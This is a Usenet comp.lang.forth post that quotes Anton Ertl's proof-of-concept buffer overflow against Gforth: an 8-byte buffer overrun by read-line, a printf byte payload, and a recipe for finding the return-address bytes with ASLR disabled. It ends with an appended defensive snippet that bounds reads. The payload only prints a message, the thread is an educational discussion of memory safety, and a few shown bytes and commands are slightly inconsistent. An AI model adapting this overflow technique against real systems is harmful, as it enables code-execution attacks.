
   comp.lang.forth      Forth programmers eat a lot of Bratwurst      117,927 messages   


   Message 116,245 of 117,927   
   Krishna Myneni to Anton Ertl   
   Re: push for memory safe languages -- im   
   02 Mar 24 06:18:41   
   
   From: krishna.myneni@ccreweb.org   
      
   On 3/2/24 03:57, Anton Ertl wrote:   
   > anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:   
   >> If you want an example, here's one that targets the Gforth version I   
   >> am currently working with:   
   >>   
   >> : MaliciousCode ( -- )   
   >>   ." This code is malicious!" cr   
   >>   ." It will not execute normally." cr   
   >>   bye ;   
   >>   
   >> create buffer1 8 allot   
   >>   
   >> :noname buffer1 96 stdin read-line . ; execute   
   >> bye   
   >>   
   >> When I put this into a file xploit.fs and then perform   
   >>   
   >> printf "0123456789012345678901234567890123456789012345678901245678901234567890123456789\x33\x5b\x57\x55\x55\x55\x00\x00\x68\xc\xed\xe9\xff\x7f\x00\x00"|   
   >>   setarch `uname -m` -R gforth xploit.fs   
   >>   
   >> I get the following output:   
   >>   
   >> This code is malicious!   
   >> It will not execute normally.   
   >   
   > I forgot to give a recipe for the printf above:   
   >   
   > insert   
   >   
   > ' call -2 cells + 8 dump ' MaliciousCode sp@ 8 dump drop   
   >   
   > right before the execute, and the dumps contain the bytes you have to   
   > put into the printf after the 80th byte, in that order.  I.e.:   
   >   
   > : MaliciousCode ( -- )   
   >    ." This code is malicious!" cr   
   >    ." It will not execute normally." cr   
   >    bye ;   
   >   
   > create buffer1 8 allot   
   >   
   > :noname buffer1 96 stdin read-line . ;   
   > ' call -2 cells + 8 dump ' MaliciousCode sp@ 8 dump drop   
   > execute   
   > bye   
   >   
   > and run it with   
   >   
   > echo|setarch `uname -m` -R gforth xploit.fs gforth xploit.fs   
   >   
   > For the particular Gforth at hand, this produces:   
   >   
   > 7FFFE9E43160: 33 5B 57 55  55 55 00 00 -                           3[WUUU..   
   >   
   > 7FFFE9AF6FF0: 68 DC ED E9  FF 7F 00 00 -                           h.......   
   >   
   > exactly the bytes in the printf above.   
   >   
      
   Nice example. I can't reproduce it with an older version of gforth   
   (0.7.9_20220120), but the proof of concept attack is going to be Forth   
   system-dependent.   
      
   Curious as to why you did not use standard ACCEPT for the illustration.   
      
   --   
   Krishna   
      
   --- SoupGate-Win32 v1.05   
    * Origin: you cannot sedate... all the things you hate (1:229/2)   
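A defensive counterpart to the read-line example in the thread, added here and not part of either poster's message: the overflow comes from handing read-line a length (96) larger than the allotment (8), so the buffer word below carries its own capacity and the checked reader refuses any larger request (assumes Gforth, which the thread targets; the word names are this example's own).

```forth
\ Added example, not from the thread: tie the read length to the
\ allocation instead of typing it by hand next to the buffer.

\ sized-buffer: define a named buffer that returns ( c-addr u-cap )
: sized-buffer ( u-cap "name" -- )
  create dup , allot            \ store capacity, then reserve bytes
  does> ( -- c-addr u-cap ) dup cell+ swap @ ;

8 sized-buffer buffer1          \ buffer1 ( -- c-addr 8 )

\ checked-read-line: abort if the caller asks for more than fits.
\ A line longer than u-cap is cut at u-cap; read-line never writes
\ past c-addr+u-cap.
: checked-read-line ( c-addr u-cap u-req fileid -- u2 flag ior )
  >r over u> abort" requested length exceeds buffer capacity"
  r> read-line ;

\ Safe: the length comes from the buffer itself.
: read-safe ( -- ) buffer1 stdin read-line throw drop . ;

\ Refused: the same mistake as in xploit.fs, caught before any write.
: read-refused ( -- ) buffer1 96 stdin checked-read-line throw drop . ;
```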
